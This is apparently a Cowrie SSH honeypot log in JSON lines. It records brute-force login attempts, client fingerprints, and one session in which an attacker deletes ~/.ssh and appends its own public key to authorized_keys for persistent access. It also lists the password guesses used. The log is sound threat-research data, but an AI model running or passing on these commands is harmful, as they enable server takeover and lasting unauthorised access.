{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:19:32.446014Z","src_ip":"212.227.235.229","session":"606af24e9da0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:32.529019Z","src_ip":"212.227.235.229","session":"606af24e9da0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:32.531035Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47896,"dst_ip":"1.2.3.4","dst_port":22,"session":"f33c2c1bd73b","protocol":"ssh","message":"New connection: 212.227.125.160:47896 (1.2.3.4:22) [session: f33c2c1bd73b]","sensor":"my-vps","timestamp":"2025-08-31T05:19:38.770254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:39.308677Z","src_ip":"212.227.125.160","session":"f33c2c1bd73b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:19:39.309457Z","src_ip":"212.227.125.160","session":"f33c2c1bd73b"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234567","message":"login attempt [test/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:40.864918Z","src_ip":"212.227.125.160","session":"f33c2c1bd73b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:41.036165Z","src_ip":"212.227.235.229","session":"c937ae2f9168"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:19:41.036931Z","src_ip":"212.227.235.229","session":"c937ae2f9168"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:42.302131Z","src_ip":"212.227.125.160","session":"f33c2c1bd73b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50462,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d730f1240fa","protocol":"ssh","message":"New connection: 212.227.235.229:50462 (1.2.3.4:22) [session: 3d730f1240fa]","sensor":"my-vps","timestamp":"2025-08-31T05:19:51.736166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:51.741695Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:51.990408Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2022","message":"login attempt [root/Admin@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:19:52.997196Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:19:53.516889Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:19:53.517653Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:19:53.518860Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:53.770709Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.session.closed","duration":"106.1","message":"Connection lost after 106.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.089151Z","src_ip":"212.227.235.229","session":"922d0835187b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:19:54.329414Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.330297Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.585172Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.586317Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51764,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd8fbd83a7b4","protocol":"ssh","message":"New connection: 212.227.235.229:51764 (1.2.3.4:22) [session: bd8fbd83a7b4]","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.843336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:54.846761Z","src_ip":"212.227.235.229","session":"bd8fbd83a7b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:55.100054Z","src_ip":"212.227.235.229","session":"bd8fbd83a7b4"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:55.161601Z","src_ip":"212.227.125.160","session":"ee130ea32a1d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:56.131200Z","src_ip":"212.227.235.229","session":"bd8fbd83a7b4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:57.389819Z","src_ip":"212.227.235.229","session":"bd8fbd83a7b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52926,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cff95ce531b","protocol":"ssh","message":"New connection: 212.227.235.229:52926 (1.2.3.4:22) [session: 5cff95ce531b]","sensor":"my-vps","timestamp":"2025-08-31T05:19:57.628224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:57.629137Z","src_ip":"212.227.235.229","session":"5cff95ce531b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:57.885827Z","src_ip":"212.227.235.229","session":"5cff95ce531b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:19:58.928510Z","src_ip":"212.227.235.229","session":"5cff95ce531b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:59.184256Z","src_ip":"212.227.235.229","session":"5cff95ce531b"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:59.186390Z","src_ip":"212.227.235.229","session":"3d730f1240fa"}
{"eventid":"cowrie.session.closed","duration":"81.0","message":"Connection lost after 81.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:05.965152Z","src_ip":"212.227.125.160","session":"ee130ea32a1d"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:13.533026Z","src_ip":"212.227.235.229","session":"c937ae2f9168"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40456,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5f58e98fdd4","protocol":"ssh","message":"New connection: 212.227.235.229:40456 (1.2.3.4:22) [session: b5f58e98fdd4]","sensor":"my-vps","timestamp":"2025-08-31T05:20:15.828270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:20:15.829421Z","src_ip":"212.227.235.229","session":"b5f58e98fdd4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:20:16.104374Z","src_ip":"212.227.235.229","session":"b5f58e98fdd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36954,"dst_ip":"1.2.3.4","dst_port":22,"session":"437734e7bbfe","protocol":"ssh","message":"New connection: 212.227.235.229:36954 (1.2.3.4:22) [session: 437734e7bbfe]","sensor":"my-vps","timestamp":"2025-08-31T05:20:16.122123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:20:16.860586Z","src_ip":"212.227.235.229","session":"437734e7bbfe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:20:16.861249Z","src_ip":"212.227.235.229","session":"437734e7bbfe"}
{"eventid":"cowrie.login.failed","username":"lai","password":"123456","message":"login attempt [lai/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:17.244318Z","src_ip":"212.227.235.229","session":"b5f58e98fdd4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:18.521270Z","src_ip":"212.227.235.229","session":"b5f58e98fdd4"}
{"eventid":"cowrie.session.closed","duration":"52.3","message":"Connection lost after 52.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:19.871714Z","src_ip":"212.227.235.229","session":"c937ae2f9168"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345678","message":"login attempt [test/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:22.788471Z","src_ip":"212.227.235.229","session":"437734e7bbfe"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":38218,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb868f3d18db","protocol":"ssh","message":"New connection: 170.64.166.123:38218 (1.2.3.4:22) [session: fb868f3d18db]","sensor":"my-vps","timestamp":"2025-08-31T05:20:23.542562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:20:23.543427Z","src_ip":"170.64.166.123","session":"fb868f3d18db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:20:23.818274Z","src_ip":"170.64.166.123","session":"fb868f3d18db"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:24.554706Z","src_ip":"212.227.235.229","session":"437734e7bbfe"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"123.com","message":"login attempt [jacob/123.com] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:24.958162Z","src_ip":"170.64.166.123","session":"fb868f3d18db"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:26.235154Z","src_ip":"170.64.166.123","session":"fb868f3d18db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33696,"dst_ip":"1.2.3.4","dst_port":22,"session":"94e0e91e3868","protocol":"ssh","message":"New connection: 212.227.125.160:33696 (1.2.3.4:22) [session: 94e0e91e3868]","sensor":"my-vps","timestamp":"2025-08-31T05:20:26.355903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.214768Z","src_ip":"212.227.125.160","session":"94e0e91e3868"}
